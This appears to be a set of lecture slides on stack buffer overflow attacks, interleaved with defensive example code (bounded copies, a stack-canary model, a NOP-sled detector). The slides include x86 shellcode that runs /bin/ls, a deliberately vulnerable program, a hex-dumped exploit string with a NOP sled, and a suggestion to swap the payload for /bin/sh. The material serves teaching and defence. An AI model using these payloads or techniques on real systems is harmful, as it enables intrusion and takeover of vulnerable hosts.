Ch5 Buffer Overflow Concept
-
8/9/2019 Ch5 Buffer Overflow Concept
1/69
Buffer Overflow
Attack Concept
-
Outline
Background
Basic Concept
Attack Flow
NOP technique
Attack Example: Slammer
-
Essential attack method
Try a web search for "buffer overflow exploit".
Check alt.2600, rootshell.com, antionline.com: you can find long lists of exploits based on buffer overflow.
Even the original version of ssh had a problem! (after they made a big deal that there were no buffer overflow problems in their code).
-
The Problem
#include <stdio.h>
#include <string.h>
void foo(char *s) {
char buf[10];
strcpy(buf,s);           /* no check that s fits in the 10-byte buffer */
printf("buf is %s\n",s);
}
foo("thisstringistoolongforfoo");
-
Exploitation
The general idea is to give programs (servers) very large strings that will overflow a buffer.
For a server with sloppy code it's easy to crash the server by overflowing a buffer (SEGV typically).
It's sometimes possible to actually make the server do whatever you want (instead of crashing).
-
Buffer Overflow
Some unsafe functions in the C library (no verification of the destination size):
strcpy(char *dest, const char *src);
strcat(char *dest, const char *src);
getwd(char *buf);
gets(char *s);
fscanf(FILE *stream, const char *format, ...);
scanf(const char *format, ...);
realpath(char *path, char resolved_path[]);
sprintf(char *str, const char *format, ...);
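The functions on this list all write into a destination whose size they are never told. As an added example (not from the slides), the following shows the bounded copy that foo() on the earlier slide lacks, and the same check applied to a formatted write, where snprintf() replaces sprintf(). The function names copy_checked and format_checked are assumptions for this demo; the 10-byte buffer and the long argument are the ones from the slide.

```c
#include <stdio.h>
#include <string.h>

/* Bounded replacement for the unchecked strcpy() in foo().
   Copies src into dst only if it fits, terminating NUL included.
   Returns 0 on success, -1 if src is too long; on -1 dst is left as an
   empty string rather than a partial copy, so a caller cannot mistake
   truncated data for the real input. */
int copy_checked(char *dst, size_t dstsize, const char *src) {
    size_t n = 0;
    if (dstsize == 0) return -1;
    while (n < dstsize && src[n] != '\0')   /* never scan past dstsize */
        n++;
    if (n == dstsize) {                      /* no room left for the NUL */
        dst[0] = '\0';
        return -1;
    }
    memcpy(dst, src, n + 1);
    return 0;
}

/* The slide's foo() with the copy checked. Returns 0 if the string was
   printed, -1 if it was rejected as too long for buf. */
int foo_checked(const char *s) {
    char buf[10];
    if (copy_checked(buf, sizeof buf, s) != 0) {
        fprintf(stderr, "rejected: input longer than %zu bytes\n", sizeof buf - 1);
        return -1;
    }
    printf("buf is %s\n", buf);
    return 0;
}

/* Same idea for sprintf(): snprintf() takes the size and returns the length
   it wanted to write, so a value >= dstsize means the output was cut off. */
int format_checked(char *dst, size_t dstsize, int id, const char *name) {
    int wanted = snprintf(dst, dstsize, "user %d: %s", id, name);
    return (wanted < 0 || (size_t)wanted >= dstsize) ? -1 : 0;
}

int main(void) {
    char line[16];
    foo_checked("short");                                   /* fits: printed */
    foo_checked("thisstringistoolongforfoo");               /* rejected */
    printf("%d\n", format_checked(line, sizeof line, 7, "alice"));              /* 0 */
    printf("%d\n", format_checked(line, sizeof line, 7, "a-much-longer-name")); /* -1 */
    return 0;
}
```

The same pattern applies to the rest of the list: fgets(buf, sizeof buf, stdin) in place of gets(), and a field width such as "%9s" for a 10-byte buffer in scanf(), so that the callee knows where the destination ends.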
-
Background Necessary
C functions and the stack.
A little knowledge of assembly/machine language.
How system calls are made (at the machine-code level).
exec() system calls.
How to guess some key parameters.
-
CPU/OS dependency
Building an exploit requires knowledge of the specific CPU and operating system of the target.
I'll just talk about x86 and Linux, but the methods work for other CPUs and OSs.
Some details are very different, but the concepts are the same.
-
Outline
Background
Basic Concept
Attack Flow
NOP technique
Attack Example: Slammer
-
C Call Stack
When a function call is made, the return address is put on the stack.
Often the values of parameters are put on the stack.
Usually the function saves the stack frame pointer (on the stack).
Local variables are on the stack.
-
[Figure: stack layout. The stack grows from high addresses to low, strings grow the other way. From high to low: arguments, return address, previous frame pointer, local variables; the stack pointer marks the low end.]
-
Stack Direction
On Linux (x86) the stack grows from high addresses to low.
Pushing something on the stack moves the Top Of Stack towards the address 0.
-
[Figure: A Stack Frame, from high to low addresses: parameters, return address, calling frame pointer, local variables. SP marks the low end and items in the frame are addressed as SP+offset; address 00000000 is at the bottom.]
-
Sample Stack
[Figure: the stack after foo(18) is called, from high to low addresses: 18 (the argument j), the return address (address of y=3), the saved stack pointer, y, x, buf.]
x=2;
foo(18);
y=3;
void foo(int j) {
int x,y;
char buf[100];
x=j;
}
-
Smashing the Stack*
The general idea is to overflow a buffer so that it overwrites the return address.
When the function is done it will jump to whatever address is on the stack.
We put some code in the buffer and set the return address to point to it!
-
Before and After
void foo(char *s) {
char buf[100];
strcpy(buf,s);
}
[Figure: foo's frame before the copy: address of s, return address, saved sp, buf. After the copy: address of s, a pointer to the small program in place of the return address, and the small program itself filling buf.]
-
[Figure: the stack layout diagram, repeated.]
-
[Figure: the stack layout (high to low: arguments, return address, previous frame pointer, local variables; stack pointer at the low end) with the frames of foo and bar as foo calls bar.]
bar( )
{}
foo( )
{
call bar( );
}
-
int bar(int a, int b){
int i, j;
char buf[9];
i = 5;
j = 123;
strcpy(buf, "securephdbcde");
}
[Figure: Buffer Overflow. bar's frame after the copy, from high to low: b, a, return address, SFP, i = 05 00 00 00, j = 65 00 00 00 ("e" and the terminator), buf = 64 62 63 64 ("dbcd"), 72 65 70 68 ("reph"), 73 65 63 75 ("secu"). The 13 characters plus the terminator spill past buf into j.]
-
int bar(int a, int b){
int i, j;
char buf[9];
i = 5;
j = 123;
strcpy(buf, "securephdaaabbbbcccceeeeffff");
}
[Figure: Ret Overflow. bar's frame after the copy: the string runs through buf, j, i, the SFP and the return address (originally i = 5, j = 123) with the bytes 73 65 63 75, 72 65 70 68, 64 61 61 61, 62 62 62 62, 63 63 63 63, 64 64 64 64, 65 65 65 65.]
Segmentation fault...
RetAddr = 0x65656565
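The two bar() slides show the same unchecked copy at two lengths: one that only reaches j, and one that runs through the saved frame pointer and return address. The following is an added example, not from the slides: it models bar()'s frame as a struct so the byte layout is fixed (struct members sit at increasing addresses, the same low-to-high order as the stack picture: buf, j, i, then the control data), and it adds the guard word that a stack protector places between the locals and the saved frame pointer. The struct, the canary constant and the placeholder SFP/return values are assumptions for the demo; the overwritten value of j shown as 0x65 assumes a little-endian machine.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Hypothetical model of bar()'s frame, not the compiler's real layout.
   Offsets follow from 4-byte int alignment: buf occupies 9 bytes plus 3
   bytes of padding, so j starts at offset 12, exactly where the slide's
   dump shows "65 00 00 00" after the 12 bytes of "securephdbcd". */
struct frame {
    char buf[9];        /* offset 0: the 9-byte buffer (+3 padding bytes) */
    int j;              /* offset 12 */
    int i;              /* offset 16 */
    uint32_t canary;    /* offset 20: guard word a stack protector inserts */
    uint32_t saved_fp;  /* offset 24: stands in for the SFP */
    uint32_t ret_addr;  /* offset 28: stands in for the return address */
};

#define CANARY_VALUE 0xA5C3E1F0u  /* constructed; a real canary is random per run */

/* Set the frame up the way bar() does (i = 5, j = 123). The control
   values are constructed placeholders, not real addresses. */
void frame_init(struct frame *f) {
    memset(f, 0, sizeof *f);
    f->i = 5;
    f->j = 123;
    f->canary = CANARY_VALUE;
    f->saved_fp = 0xBFFFF800u;
    f->ret_addr = 0x08048400u;
}

/* The slide's strcpy(buf, ...): copies the string and its NUL starting at
   buf with no regard for sizeof buf. It is capped at the size of the model
   frame only so that this demo never writes outside the struct. */
struct frame overflow_frame(const char *src) {
    struct frame f;
    size_t n = strlen(src) + 1;
    frame_init(&f);
    if (n > sizeof f) n = sizeof f;
    memcpy((unsigned char *)&f, src, n);   /* buf sits at offset 0 of the frame */
    return f;
}

/* The check a stack protector performs just before bar() returns. */
int canary_intact(const struct frame *f) {
    return f->canary == CANARY_VALUE;
}

/* 1 if bar() could return after copying src, 0 if the guard word was
   clobbered (a real protector aborts here instead of using the corrupted
   return address). */
int bar_returns_safely(const char *src) {
    struct frame f = overflow_frame(src);
    return canary_intact(&f);
}

int main(void) {
    struct frame f = overflow_frame("securephdbcde");    /* 13 chars into buf[9] */
    printf("j = %d, i = %d, guard %s\n", f.j, f.i,
           canary_intact(&f) ? "intact" : "CLOBBERED");
    f = overflow_frame("securephdaaabbbbcccceeeeffff");
    printf("j = 0x%x, i = 0x%x, canary = 0x%x, guard %s\n",
           (unsigned)f.j, (unsigned)f.i, f.canary,
           canary_intact(&f) ? "intact" : "CLOBBERED");
    return 0;
}
```

With the short string the guard stays intact even though j is already corrupted, which is the limit of a canary: it protects the control data, not the neighbouring locals. With the long string the guard reads 0x65656565 ("eeee"), the same bytes the slide shows landing in the return address, and the check fails before RET is reached.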
-
[Figure: the foo/bar stack layout, repeated.]
-
[Figure: the foo/bar stack layout, repeated.]
-
Outline
Background
Basic Concept
Attack Flow
NOP technique
Attack Example: Slammer
-
Control Flow Hijack
I want my code executed!
Malicious code injection
Control flow redirection/hijacking
[Figure: injected code inside a virus or worm.]
-
A Single Packet Exploit
[Figure: one packet carrying the attack code and the exploit's return address; Return Address == 0x4739a304.]
-
Issues
How do we know what value the pointer should have (the new return address)?
It's the address of the buffer, but how do we know what address this is?
How do we build the small program and put it in a string?
-
Guessing Addresses
Typically you need the source code so you can estimate the address of both the buffer and the return-address.
An estimate is often good enough! (more on this in a bit).
-
Building the small program
Typically, the small program stuffed into the buffer does an exec().
Sometimes it changes the password db or other files.
-
exec()
In Unix, the way to run a new program is with the exec() system call.
There is actually a family of exec() system calls.
This doesn't create a new process; it changes the current process to a new program.
To create a new process you need something else (fork()).
-
exec() example
#include <unistd.h>
#include <stdio.h>
char *args[] = {"/bin/ls", NULL};
void execls(void) {
execv("/bin/ls",args);
printf("I'm not printed\n");   /* execv only returns if it fails */
}
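The two points the exec() slides make, that a successful exec never returns and that a separate process needs fork(), can be seen directly. The following is an added example, not from the slides; it uses a constructed path that does not exist so that both calls return and the failure path is observable.

```c
#include <errno.h>
#include <stdio.h>
#include <sys/wait.h>
#include <unistd.h>

/* execv() returns only when it fails: on success the process image is
   replaced and nothing after the call runs, which is why the printf on the
   slide is never printed. This wrapper hands back errno so the failure
   case can be checked. */
int exec_errno(const char *path) {
    char *const argv[] = { (char *)path, NULL };
    execv(path, argv);          /* on success this is the last line executed */
    return errno;               /* reached only if the exec failed */
}

/* To start a program and keep the current process, fork() first and exec
   in the child. The parent waits and returns the child's exit status. */
int run_in_child(const char *path) {
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        char *const argv[] = { (char *)path, NULL };
        execv(path, argv);
        _exit(127);             /* exec failed in the child; shells use 127 for this */
    }
    int status;
    if (waitpid(pid, &status, 0) != pid) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void) {
    /* constructed path that does not exist, so both calls come back */
    const char *missing = "/nonexistent/example-program";
    printf("execv failed with errno %d (ENOENT is %d)\n", exec_errno(missing), ENOENT);
    printf("child exit status %d\n", run_in_child(missing));
    return 0;
}
```

Had the path existed, exec_errno() would never have returned and the second printf in main would not run; run_in_child() would still return, because only the child was replaced.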
-
Generating a String
You can take code like the previous slide, and generate machine language.
Copy down the individual byte values and build a string.
To do a simple exec requires less than 100 bytes.
-
A Sample Program/String
Does an exec() of /bin/ls:
unsigned char cde[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0"
"\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c"
"\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/ls";
-
Some important issues
The small program should be position-independent: able to run at any memory location.
It can't be too large, or we can't fit the program and the new return-address on the stack!
-
Sample Overflow Program
#include <stdio.h>
unsigned char cde[] = "\xeb\x1f..."; /* the exec /bin/ls string from the earlier slide */
void tst(void) {
int *ret;
ret = (int *)&ret+2; // pointer arith! (32-bit x86: two slots above ret is the return address)
(*ret) = (int) cde;  // change ret addr
}
int main(void) {
printf("Running tst\n");
tst();
printf("foo returned\n");
}
-
Attacking a real program
Recall that the idea is to feed a server a string that is too big for a buffer.
This string overflows the buffer and overwrites the return address on the stack.
Assuming we put our small program in the string, we need to know its address.
-
Outline
Background
Basic Concept
Attack Flow
NOP technique
Attack Example: Slammer
-
NOPs
Most CPUs have a No-Operation instruction; it does nothing but advance the instruction pointer.
Usually we can put a bunch of these ahead of our program (in the string).
As long as the new return-address points to a NOP we are OK.
-
Example (hex dump of the exploit string: offset, then 16-bit words; "*" marks repeated lines):
0000000 9090 9090 9090 9090 9090 9090 9090 9090
*
00001f0 9090 9090 22eb 895e 89f3 83f7 07c7 c031
0000200 89aa 89f9 abf0 fa89 c031 b0ab 0408 cd03
0000210 3180 89db 40d8 80cd d9e8 ffff 2fff 6962
0000220 2f6e 6873 f822 bfff f822 bfff f822 bfff
0000230 f822 bfff f822 bfff f822 bfff f822 bfff
*
00004a0 f822 bfff f822 bfff f822 bfff 9090 9090
00004b0 fa48 bfff
-
Example: NOP-sled
[Same hex dump as on the previous slide.]
Sometimes we cannot easily determine the exact memory address to jump into.
-
NOP Sled Engineering
[Figure: an exploit string of attack code + exploit (return address), and the same string with NOP NOP ... prepended.]
code[] = "\xeb\x2a\x5f\xc6\x47\x07\x00\x89\x7f\x08\xc7\x47";
strcpy(buf, code);
buf = "\xeb\x2a\x5f\xc6\x47\x07"
(strcpy stops at the first \x00 byte, so only the first six bytes reach buf.)
And, sometimes, we simply want to find a way to avoid \x00.
-
Detecting NOP Sleds
Intrusion Prevention Systems or Advanced Firewalls
[Figure: an Intrusion Prevention System in front of legacy victims analyzes each packet against NOP sled signatures and drops matches.]
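What such a signature keys on can be seen by running it over the hex dump from the NOP-sled slides. The following is an added example, not from the slides: it rebuilds the raw bytes from that dump (whose format it assumes to be od-style with hex offsets and 16-bit words printed by a little-endian machine, which is why the bytes eb 22 appear as "22eb"), measures the longest run of 0x90 bytes, and counts how often the guessed return address 0xbffff822 is repeated, the other tell-tale part of the string described under "Estimating the stack size". The 64-byte sled threshold is an arbitrary choice. As the later slide notes, a NOP run is a weak signature: most worms do not need the sled and a polymorphic encoder changes the bytes, so treat this as one indicator, not a verdict.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* The hex dump from the slide, embedded as a string. Format: hex offset,
   then up to eight 16-bit words; a lone "*" means "the previous line
   repeats until the next listed offset". */
static const char *const slide_dump =
    "0000000 9090 9090 9090 9090 9090 9090 9090 9090\n"
    "*\n"
    "00001f0 9090 9090 22eb 895e 89f3 83f7 07c7 c031\n"
    "0000200 89aa 89f9 abf0 fa89 c031 b0ab 0408 cd03\n"
    "0000210 3180 89db 40d8 80cd d9e8 ffff 2fff 6962\n"
    "0000220 2f6e 6873 f822 bfff f822 bfff f822 bfff\n"
    "0000230 f822 bfff f822 bfff f822 bfff f822 bfff\n"
    "*\n"
    "00004a0 f822 bfff f822 bfff f822 bfff 9090 9090\n"
    "00004b0 fa48 bfff\n";

/* Rebuild raw bytes from the listing ("22eb" -> bytes eb 22). Returns the
   byte count, or -1 if the listing is malformed (offset gap, bad word,
   or not enough room in out). */
int parse_hex_dump(const char *text, unsigned char *out, size_t cap) {
    unsigned char prev[16];            /* bytes of the last explicit line */
    size_t prev_len = 0, n = 0;
    int repeat_pending = 0;
    const char *p = text;

    while (*p != '\0') {
        const char *eol = strchr(p, '\n');
        size_t len = eol ? (size_t)(eol - p) : strlen(p);
        char line[128], *cur = line, *end;
        unsigned long off, w;
        if (len >= sizeof line) return -1;
        memcpy(line, p, len);
        line[len] = '\0';
        p = eol ? eol + 1 : p + len;
        if (line[0] == '\0') continue;
        if (line[0] == '*') { repeat_pending = 1; continue; }

        off = strtoul(cur, &cur, 16);
        if (repeat_pending) {              /* expand "*" with copies of prev */
            if (prev_len == 0) return -1;
            while (n < off) {
                if (n + prev_len > cap) return -1;
                memcpy(out + n, prev, prev_len);
                n += prev_len;
            }
            repeat_pending = 0;
        }
        if (off != n) return -1;           /* the listing must be contiguous */

        prev_len = 0;
        while (*cur == ' ') cur++;
        while (*cur != '\0') {
            w = strtoul(cur, &end, 16);
            if (end - cur != 4 || prev_len + 2 > sizeof prev) return -1;
            prev[prev_len++] = (unsigned char)(w & 0xff);   /* low byte first */
            prev[prev_len++] = (unsigned char)(w >> 8);
            for (cur = end; *cur == ' '; cur++) ;
        }
        if (n + prev_len > cap) return -1;
        memcpy(out + n, prev, prev_len);
        n += prev_len;
    }
    return (int)n;
}

/* Longest run of 0x90 (NOP) bytes: the feature a NOP-sled signature keys on. */
size_t longest_nop_run(const unsigned char *b, size_t n) {
    size_t best = 0, run = 0;
    for (size_t i = 0; i < n; i++) {
        run = (b[i] == 0x90) ? run + 1 : 0;
        if (run > best) best = run;
    }
    return best;
}

/* Occurrences of a 4-byte little-endian value at any offset: the block of
   repeated guessed return addresses in the string. */
size_t count_repeated_word(const unsigned char *b, size_t n, unsigned long v) {
    size_t count = 0;
    for (size_t i = 0; i + 4 <= n; i++) {
        unsigned long w = (unsigned long)b[i] | (unsigned long)b[i + 1] << 8
                        | (unsigned long)b[i + 2] << 16 | (unsigned long)b[i + 3] << 24;
        if (w == v) count++;
    }
    return count;
}

/* Signature decision: flag a payload whose NOP run is at least min_run
   bytes. The threshold is a tunable assumption, not from the slides. */
int looks_like_nop_sled(const unsigned char *b, size_t n, size_t min_run) {
    return longest_nop_run(b, n) >= min_run;
}

int main(void) {
    unsigned char bytes[4096];
    int n = parse_hex_dump(slide_dump, bytes, sizeof bytes);
    if (n < 0) { puts("malformed dump"); return 1; }
    printf("%d bytes, longest NOP run %zu, 0xbffff822 repeated %zu times, sled: %s\n",
           n, longest_nop_run(bytes, (size_t)n),
           count_repeated_word(bytes, (size_t)n, 0xbffff822ul),
           looks_like_nop_sled(bytes, (size_t)n, 64) ? "yes" : "no");
    return 0;
}
```

On the slide's dump this reconstructs 1204 bytes, a 500-byte NOP run (the 31 repeated lines plus the first two words of the line at 1f0) and 162 copies of the return address, which is the shape the next slides call a worm with a NOP sled.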
-
Attack polymorphism (many different ways)
[Figure: two exploit strings for the same vulnerability: attack code + exploit (return address) in the clear, versus decryption code followed by the attack code + exploit (return address).]
The Signature Explosion Problem!!
-
A WORM with a NOP-Sled
[Same hex dump as on the earlier NOP-sled slides.]
-
NOP sleds
A NOP sled cannot and will not be a useful signature for detecting future worms.
80~90% of the worms today don't really need NOP sleds, but, historically, they are still left there.
-
Memory Address Ranges
[Figure: two stack frames with the same layout (arguments, return address, previous frame pointer, local variables) placed at different address ranges.]
One exploit has one return address value, but another exploit based on the same vulnerability might be using a different return address.
-
Using NOPs
[Figure: the three parts of the exploit string: nop instructions, the real program (exec /bin/ls or whatever), and the new return address.]
-
Estimating the stack size
We can also guess at the location of the return address relative to the overflowed buffer.
Put in a bunch of new return addresses!
-
Estimating the Location
[Figure: the exploit string with nop instructions, the real program, and many copies of the new return address.]
-
vulnerable.c
#include <stdio.h>
#include <string.h>
#include <unistd.h>
void foo( char *s ) {
char name[200];
strcpy(name,s);          /* s can be up to 2000 bytes: overflow */
printf("Name is %s\n",name);
}
int main(void) {
char buf[2000];
read(0,buf,2000);
foo(buf);
}
-
genpgm.c
genpgm.c was constructed to exploit the buffer overflow in vulnerable.c.
It allows the user to add an offset to a fixed guess of the address of the return-address on the stack.
It writes (to stdout) a string that contains a bunch of return-addresses and a program that does: exec /bin/ls.
-
Testing
./genpgm 16 | ./vulnerable
Get ambitious! Change the program output by genpgm to exec /bin/sh!
(./genpgm; cat) | ./vulnerable
-
[Figure: anatomy of an attack packet: IP header, upper-layer (TCP/UDP) header, then a payload made of a NOP sled, decryption code, attack code and exploit (return address), followed by the system state changes it causes.]
How can each of the stages be polymorphic?
-
DEMONSTRATION OF BUFFER OVERFLOW
http://www.youtube.com/watch?v=ZZ0LVAFIDrA
-
Outline
Background
Basic Concept
Attack Flow
NOP technique
Attack Example: Slammer
-
Attack technique
Use the ESP register to record the attack code's execution address: jmp ESP
[Figure: the registers involved: ESP (stack pointer) and EBP (stack base).]
-
High
Low
Stack
Growth
Arguments
Return address
Prev. frame pointer
Local variables
Stack
Pointer
jmp ESP
foo
barret
11,000
-
Attack flow
Start:
CALL FunctionWithBufferOverflow
FunctionWithBufferOverflow:
PUSH EBP
MOV EBP,ESP
CALL OverflowMyBuffer
POP EBP
RET
-
[Same listing; stack at this step: ESP points at the top of the stack, before the CALL.]
-
[Same listing; stack at this step: after CALL FunctionWithBufferOverflow, the return address Start+6 is on the stack and ESP points to it.]
-
[Same listing; stack at this step: after PUSH EBP, the old EBP sits below the return address Start+6 and ESP points to it.]
-
[Same listing; stack at this step: after MOV EBP,ESP, ESP and EBP coincide; MyBuffer is allocated below the old EBP and the return address Start+6.]
-
[Same listing; stack at this step: OverflowMyBuffer fills MyBuffer and beyond with Attack0 ... Attack8, overwriting the old EBP and the return address.]
-
[Same listing; stack at this step: after POP EBP, EBP == Attack5; the return address slot now holds the address of a jmp ESP instruction, and once RET pops it ESP points just past that slot, at the attack code.]
-
Results
This is how Slammer worked; Sasser is very similar, as are a couple of others.
The bogus return pointer is Attack6; the payload starts at Attack7.
-
Jump to other registers
EBX: base register for indexing the buffer base. Code Red II and Blaster (RPC DCOM) used EBX.
JMP EBX: 0xff 0xd3 => 0x0100139d
EDI: destination register for string operations. ASN.1 uses EDI.
-
High
Low
Stack
Growth
Arguments
Return address
Prev. frame pointer
Local variables
Stack
Pointer
jmp ESP
foo
barret
jmp EBX
-
Register Spring + Polymorphic
[Figure: exploit string made of NOPs, decryption code, attack code and the exploit (register spring); the return address 0x0100139d points at the jump instruction, and the parts that vary between variants are marked ????.]